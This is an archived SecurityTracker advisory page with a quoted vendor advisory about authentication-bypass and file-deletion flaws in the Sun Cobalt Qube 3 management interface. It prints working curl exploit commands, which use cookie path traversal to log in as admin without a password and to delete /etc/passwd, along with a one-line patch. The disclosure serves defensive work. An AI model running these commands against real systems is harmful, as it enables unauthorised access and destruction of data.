SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Device (Embedded Server/Appliance)  >  Qube Vendors:  Sun
Sun Cobalt Qube 3 Appliance Access Control Bugs Let Remote Users Access New User Accounts or Delete Files on the System and Let Local Users Gain 'Admin' Privileges
SecurityTracker Alert ID:  1004837
CVE Reference:  CAN-2002-1058   (Links to External Site)
Updated:  Feb 21 2004
Original Entry Date:  Jul 25 2002
Impact:  Denial of service via network, Modification of system information, Modification of user information, Root access via local system, User access via network
Exploit Included:  Yes  
Version(s): Qube 3; Cobalt Linux release 6.0 (Carmel) Kernel 2.2.16C7
Description:  Several access control vulnerabilities were reported in the Cobalt Qube 3 system management interface. A remote user may be able to obtain administrative access on the management interface.

It is reported that a local user with the ability to create file on the server can create a specially crafted file in the '/tmp/test' directory to mimick an authentication cookie. A demonstration exploit command is provided:

$ printf "admin" > /tmp/test

This will allow the remote user to login with 'admin' privileges without supplying a password using the following type of command [using the 'curl' URL generation tool]:

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php

It is also reported that if a user account has been newly created, a remote user can login without supplying authentication credentials:

$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php

According to the report, any remote user can delete arbitrary files on the server by specifying the path to the file and the first 31 characters of the file name. A demonstration exploit command that deletes the /etc/passwd file from the server is provided:

$curl -b
sessionId=../../../../../../../../etc/passwd\;loginName=root:x :0:0:root:/root:/bin/bash
http://192.168.0.1:444/splashAdmin.php

The vendor has reportedly been notified.
Impact:  A remote user can login to a newly created account without supplying a password. A remote user can delete arbitrary files from the server. A local user can gain 'admin' privileges.
Solution:  No solution was available at the time of this entry.

The authors of the report have provided the following quick solution:

/usr/sausalito/ui/libPhp/ServerScriptHelper.php

line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);
Vendor URL:  www.sun.com/hardware/serverappliances/qube3/index.html (Links to External Site)
Cause:  Access control error
Reported By:  pokley <saleh@scan-associates.net>
Message History:   None.

 Source Message Contents
Date:  Wed, 24 Jul 2002 09:40:01 +0800
From:  pokley <saleh@scan-associates.net>
Subject:  Cobalt Qube 3 Administration page

 



SCAN Associates Sdn Bhd Security Advisory


Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel)Kernel 2.2.16C7 on
an i586)

Date: 23rd July 2002

Summary: By pass login

Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
shaharil <shaharil@scan-associates.net>


Description
===========
First of all, we would like to thank you Sun Microsystem (Malaysia) for
sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the
Flag Security Conference on 16-17 July 2002. Being the winner, we are proud
to receive this cool box. After playing around for awhile, we found several
problems in Cobalt Qube 3 System Management. The most serious bug may allow
remote access as Admin. We have alerted security-alert@sun.com and Sun
Microsystem (Malaysia) on 19th July but unfortunately we did not receive any
feedback.

Details
=======

Problem 1: Local Privilege Escalation to Admin

Any user with ability to create file in any location of a Cobalt server will
be able to promote to Admin access of the System Management. A user may
create a file in /tmp/test and crafted a cookie to login as Admin without
password:

Create dummy session file in Cobalt server:

$ printf "admin" > /tmp/test

Login without password from anywhere:

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php


Problem 2: Remote User access

We also found out that if the User account is newly created, we can bypass
the authentication without a need to create dummy session file in the
server:

$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php


Problem 3: Remotely delete file

It is possible to delete file from the server by specifying the path to the
file and the first 31 characters of the file. The following example will
delete the /etc/passwd file from the server:

$curl -b
sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash 
http://192.168.0.1:444/splashAdmin.php


Quick Solution
==============

/usr/sausalito/ui/libPhp/ServerScriptHelper.php

line 64: 
$sessionId = ereg_replace("\.\.","",$sessionId);



* - curl can be download from http://curl.haxx.se/download.html


www.scan-associates.net


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC